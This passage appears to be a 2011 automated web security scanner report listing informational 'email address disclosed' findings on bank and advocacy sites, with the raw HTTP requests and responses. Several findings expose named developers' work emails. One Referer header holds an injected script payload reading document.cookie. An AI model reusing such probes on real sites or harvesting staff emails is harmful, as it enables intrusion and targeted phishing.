Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/refinance/

Issue detail

The following email address was disclosed in the response:

Request

GET /autoloans/refinance/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:27 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 24471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Refinance
...[SNIP]...
<a href="mailto:customerservice@capitalone.com">customerservice@capitalone.com</a>
...[SNIP]...

19.67. http://www.capitalone.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/

Issue detail

The following email address was disclosed in the response:

Request

GET /contactus/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:28 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 28007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Capital O
...[SNIP]...
<a href="mailto:abuse@capitalone.com?linkid=WWW_Z_Z_A1098BS312CS405_CU1_R3_01_T_Z" target="_blank">abuse@capitalone.com</a>
...[SNIP]...

19.68. http://www.capitalone.com/fraud/prevention/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /fraud/prevention/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /fraud/prevention/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:37 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 37509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...
<a href="mailto:abuse@capitalone.com">abuse@capitalone.com</a>
...[SNIP]...

19.69. http://www.capitalone.com/protection/security/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /protection/security/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /protection/security/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:37 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...
<a href="mailto:abuse@capitalone.com">abuse@capitalone.com</a>
...[SNIP]...

19.70. https://www.capitalone.com/css/footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/footer.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/footer.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 16:55:49 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 1023

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Global Footer
-------------------------------------------------------------------------------------------------
...[SNIP]...

19.71. https://www.capitalone.com/css/framework/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/framework/base.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/framework/base.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:22 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 13:58:09 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 4924

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
----------------------------------------------------------------------------------------------------*/
b
...[SNIP]...

19.72. https://www.capitalone.com/css/framework/grid.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/framework/grid.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/framework/grid.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:22 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 16:24:05 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 9434

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Grid Containers - 960 Grid System
-----------------------------------------------------------------------------
...[SNIP]...

19.73. https://www.capitalone.com/css/framework/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/framework/print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/framework/print.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 19:29:10 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 9130

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
-----------------------------------------------------------------------------*/
body {
   background: #ff
...[SNIP]...

19.74. https://www.capitalone.com/css/header.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/header.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/header.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:30 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 11:22:03 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 15991

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Header
----------------------------------------------------------------------------------------------------*/

...[SNIP]...

19.75. https://www.capitalone.com/css/page-nav-heading.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/page-nav-heading.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:30 GMT
Server: Apache
Last-Modified: Tue, 20 Oct 2009 20:24:22 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 4843

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Breadcrumb
----------------------------------------------------------------------------------------------------
...[SNIP]...

19.76. https://www.capitalone.com/css/page-type/homepage.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /css/page-type/homepage.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/page-type/homepage.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 14:21:57 GMT
Accept-Ranges: bytes
Expires: Thu, 03 Feb 2011 22:00:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css
Content-Length: 10725

/*-----------------------------------------------------------------------------
Capital One Home Page Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

.homepage h2 {
font-size: 1.3em;
margin: 0;
}
.homepage h3 {
font-size: 1.25em;
margin: 0;
}
...[SNIP]...

19.77. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:32 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=06b1a9ee60ea3411d50706d6b4b05184%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=f857207c09785572124d4877b07e3ed2%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 143217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<input type="text" id="care2ActionAlertEmail" class="email_input" name="email" value="name@address.com" />
...[SNIP]...
ronmental science, studying the way the state of the natural environment impacts our health choices. As a physician, he specializes in the field of aging. Send your health questions to Dr. Brent at drbrent@care2.com"},Isha: {name:"Isha Judd",eurl:"http://www.care2.com/c2c/people/profile.html?pid=165963260",eurltgt:"",shortbio:"Isha Judd is an internationally renowned spiritual teacher and author;\u2026",longbio:"
...[SNIP]...
er, #relatedStories h3',
       transparent: true,
       css: {
           '.sIFR-root': { 'color': '#4b8a00', 'text-transform': 'lowercase', 'font-size': '24px' }
       }
   });
CARE2.defaultEntry('care2ActionAlertEmail', 'name@address.com');CARE2.newsletterPopUp('/greenliving2/wp-content/plugins/care2_ngms/care2_ngms_servlet.php', 'newsletter_form', 'care2ActionAlertEmail', true, ['food-recipes','health-wellness','healthy-home','family
...[SNIP]...

19.78. http://www.change.org/javascripts/application.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.change.org
Path:   /javascripts/application.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascripts/application.js?1296629150 HTTP/1.1
Host: www.change.org
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: change_session_id=a46d512f09bda6991b5e2b7e21997804

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Thu, 03 Feb 2011 01:22:15 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 02 Feb 2011 06:45:50 GMT
Connection: close
Expires: Sun, 31 Jan 2021 01:22:15 GMT
Cache-Control: max-age=315360000
Content-Length: 643334

_gaq = [
['_setAccount', 'UA-5889778-1'],
['_setDomainName', '.change.org'],
['_setAllowHash', 'true'],
['_setCustomVar', 1, 'UserType', ENV.google_analytics_user_type, 2]
].concat(_gaq);
...[SNIP]...
<jared@jaredgrippe.com>
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

if (arguments.length >
...[SNIP]...

19.79. http://www.charterone.com/scripts/overlaybox/browserdetectlite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /scripts/overlaybox/browserdetectlite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/overlaybox/browserdetectlite.js HTTP/1.1
Host: www.charterone.com
Proxy-Connection: keep-alive
Referer: http://www.charterone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 4213
Content-Type: application/x-javascript
Last-Modified: Tue, 17 Feb 2009 17:05:20 GMT
Accept-Ranges: bytes
ETag: "088d8e92191c91:242"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 21:59:48 GMT

// Browser Detect Lite v2.1
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)
//
// modified by Michael Lovitt to include OmniWeb and Dreamcast

function BrowserDetectLite() {
   var ua = navigator.userAgent.toLowerCase();
   this.ua = ua;

   // browser nam
...[SNIP]...

19.80. http://www.charterone.com/security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /security/

Issue detail

The following email address was disclosed in the response:

Request

GET /security/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:23:59 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 14986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<a href="mailto:fraud_prevention@cfgcustomers.com">fraud_prevention@cfgcustomers.com</a>
...[SNIP]...

19.81. https://www.chase.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.jsp?pg_name=ccpmapp/privacy_security/fraud/page/report_fraud HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=ZdKgNJXC95pk6d7psPy260n66QTy1jdTGryGY6GQGDG5Qv2n2vlQ!1262409899; path=/
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<A
href="mailto:abuse@chase.com">abuse@chase.com</a>
...[SNIP]...
<A
href="mailto:accountatrisk@chase.com">accountatrisk@chase.com</a>
...[SNIP]...

19.82. http://www.chasemilitary.com/js/DD_belatedPNG_0.0.8a-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /js/DD_belatedPNG_0.0.8a-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/DD_belatedPNG_0.0.8a-min.js HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
